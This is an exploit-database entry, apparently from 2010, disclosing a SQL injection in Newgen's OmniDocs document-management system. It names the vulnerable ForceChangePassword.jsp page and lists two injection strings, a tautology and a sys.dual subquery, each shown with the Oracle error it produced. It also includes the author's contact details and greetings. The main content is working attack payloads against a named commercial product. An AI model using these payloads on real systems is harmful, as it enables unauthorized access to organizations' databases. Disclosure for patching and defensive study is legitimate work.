Omnidocs - SQL Injection

Author: thebluegenius
type: webapps
platform: jsp
port: 
date_added: 2010-02-10 
date_updated:  
verified: 0 
codes: OSVDB-62403;CVE-2010-0701 
tags: 
aliases:  
screenshot_url:  
application_url: 

--------------------------------------------------------------------
# Exploit Title: Omnidocs SQL injection Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.newgensoft.com/omnidocs.asp
# Version: All
# Tested on: Apache-Coyote/1.1 | JBoss
# CVE : NA

---------------------------------------------------
"Omnidocs" SQL injection vulnerability.
---------------------------------------------------
By       :Thebluegenius.
Email    :rajsm@isac.org.in
Blog	 :thebluegenius.com.
---------------------------------------------------

Description:
OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications.

------------------
Vulnerability
------------------

Affected URL: http://server/omnidocs/ForceChangePassword.jsp

Command: ' or 'a' = 'a'
Confirmed SQL Injection error :  ORA-00907: missing right parenthesis

Command: or exists (select 1 from sys.dual) and ''x''=''x'
Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated

-----------------------------------------------------
Greetz Fly Out to:
1] Amforked()  : My good friend
2] Aodrulez    : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in